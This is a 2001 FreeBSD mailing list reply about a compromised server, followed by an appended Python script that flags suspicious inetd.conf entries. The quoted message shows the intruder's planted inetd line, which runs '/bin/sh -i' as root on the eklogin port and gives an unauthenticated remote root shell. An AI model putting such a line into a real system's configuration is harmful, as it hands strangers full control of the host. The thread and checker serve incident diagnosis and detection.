From owner-freebsd-questions Thu Oct 18 13:38:37 2001
Delivered-To: freebsd-questions@freebsd.org
Received: from rutger.owt.com (rutger.owt.com [204.118.6.16]) by hub.freebsd.org (Postfix) with ESMTP id 590B837B401 for ; Thu, 18 Oct 2001 13:38:27 -0700 (PDT)
Received: from oneworld.owt.com (oneworld.owt.com [204.118.6.2]) by rutger.owt.com (8.9.3/8.9.3) with ESMTP id NAA26941; Thu, 18 Oct 2001 13:38:26 -0700
Received: from owt.com (owt-207-41-94-232.owt.com [207.41.94.232]) by oneworld.owt.com (8.11.4/8.11.4) with ESMTP id f9IKcOt08776; Thu, 18 Oct 2001 13:38:25 -0700
Message-ID: <3BCF3DBE.C705892A@owt.com>
Date: Thu, 18 Oct 2001 13:38:22 -0700
From: Kent Stewart
X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: Tomek
Cc: freebsd-questions@FreeBSD.ORG
Subject: Re: I got hacked, I think
References: <20011018131823.Y621-100000@jodie.ncptiddische.net> <011e01c157cf$9b401700$f6f073d1@mpionline.com> <20011018165057.V3734@ns2.wananchi.com> <01e701c157e4$f012abc0$f6f073d1@mpionline.com> <20011018180513.C3734@ns2.wananchi.com> <20011018114805.E70327@acadia.ne.mediaone.net> <018801c157ef$37ec0720$f6f073d1@mpionline.com> <03db01c15812$c4575d40$f6f073d1@mpionline.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.ORG

Tomek wrote:
>
> I found out more info.
>
> -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
> -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
>
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream tcp nowait root /bin/sh sh -i
>
> I take it that "sh" would not even request a login or anything if called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... how did he even log in the first time, maybe it was some
> buffer overflow or something.... yuck.

It began because you were using 4.3-release and you probably didn't fix
the security problems. There were several buffer overflow problems for
daemons that have been published for 4.3-r. The only solution in case
of a hack has been to do a wipe and reinstall.

Kent

> TY for all your help guys, you are all wonderful! I will leave you in
> peace now (I hope). I still don't know about Broot though...
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message

--
Kent Stewart
Richland, WA
http://users.owt.com/kstewart

Carl Sagan quote on Seti@home
http://setiathome.ssl.berkeley.edu/pale_blue_dot.html
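A defender-side check for the backdoor pattern Tomek found, added here as an example and not code from the thread: it parses inetd.conf entries and flags any service whose server program is a shell (as in the eklogin line above, where inetd hands the accepted socket straight to `sh -i` with no login step) or whose server binary lives outside the usual system directories. The sample configuration is constructed; the directory allow-list and shell list are assumptions for the example.

```python
from dataclasses import dataclass

# inetd connects the accepted socket to the server program's stdin/stdout,
# so a shell listed as the server is an unauthenticated remote shell run as
# the listed user. Assumed list of shells for this example.
SHELLS = {"sh", "csh", "tcsh", "bash", "ksh", "zsh"}
# Assumed directories where legitimate inetd server binaries normally live.
EXPECTED_DIRS = ("/usr/libexec/", "/usr/local/libexec/", "/usr/sbin/", "/usr/local/sbin/")

# Constructed sample: the backdoor line from the thread plus ordinary
# FreeBSD-style entries (hypothetical, not taken from any real host).
SAMPLE_INETD_CONF = """\
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
eklogin stream tcp nowait root /bin/sh sh -i
daytime stream  tcp     nowait  root    internal
"""

@dataclass
class InetdEntry:
    service: str
    socket_type: str
    proto: str
    wait: str
    user: str
    server: str
    args: list

def parse_inetd_conf(text):
    """Parse active (non-comment) inetd.conf lines into InetdEntry objects."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        fields = line.split()
        if len(fields) < 6:                    # too short to be a valid entry
            continue
        entries.append(InetdEntry(*fields[:6], fields[6:]))
    return entries

def suspicious_entries(text):
    """Return (service, reason) pairs for entries that deserve a closer look."""
    findings = []
    for e in parse_inetd_conf(text):
        if e.server == "internal":             # built-in services have no binary
            continue
        if e.server.rsplit("/", 1)[-1] in SHELLS:
            findings.append((e.service, f"server is a shell: {e.server} {' '.join(e.args)} as {e.user}"))
        elif not e.server.startswith(EXPECTED_DIRS):
            findings.append((e.service, f"server {e.server} outside expected directories, run as {e.user}"))
    return findings
```

Run it against a live /etc/inetd.conf (and any stray copies such as the /inetd.conf above) and treat every finding as something to explain before trusting the host.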